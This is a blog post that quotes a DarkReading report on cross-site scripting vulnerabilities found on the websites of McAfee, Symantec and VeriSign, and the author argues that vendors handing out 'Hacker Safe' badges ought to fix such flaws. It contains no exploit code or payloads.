Do as we say, not as we do

Posted on by Walt Turnes

From DarkReading.com:

With all the talk about hackers launching attacks from legitimate Websites, you’d think that the major security vendors’ sites, at least, would be vulnerability-free.

Not so, according to a report issued yesterday by a security watchdog site.
The site, XSSed, states that it has verified some 30 cross-site scripting vulnerabilities spread across the Websites of three of the industry’s best-known security vendors: McAfee, Symantec, and VeriSign. The vulnerabilities could make it possible for attackers to launch phishing campaigns from these sites or even distribute malware to the companies’ customers, according to XSSed.

Cross-site scripting vulnerabilities aren’t a new type of threat, and they aren’t particularly difficult to defend against. It seems a little crazy that the companies that many people depend on to help them get a handle on security don’t practice the things that they preach. Or then again, maybe they don’t even preach them:

This isn’t the first time that XSS vulnerabilities have been exposed on sites such as McAfee’s and Symantec’s, notes Jeremiah Grossman, CTO of WhiteHat Security. Back in January, XSSed reported that some 60 sites that had received the “hacker safe” label from McAfee’s ScanAlert service were vulnerable to XSS attacks. (Emphasis added)

I disagree with Grossman’s conclusion, however, that the XSS vulnerabilities on these security companies’ web sites aren’t something to worry about. His argument is that, while these are security companies, they primarily focus on anti-virus and anti-malware software. However, when these companies start handing out “Hacker Safe!” badges to other web sites (which, in my opinion, is like throwing rocks at a beehive), they put themselves in an arena in which things like simple XSS vulnerabilities cannot be overlooked. I believe that the “more important” sites that are mentioned, such as bank and e-commerce web sites, are really unlikely to have their security problems taken care of before the people that are supposed to “know security” do.

One thought on “Do as we say, not as we do

  1. PLR Products says:
    July 25, 2009 at 12:11 am

    Never really looked at the information like that before. Thanks!

Comments are closed.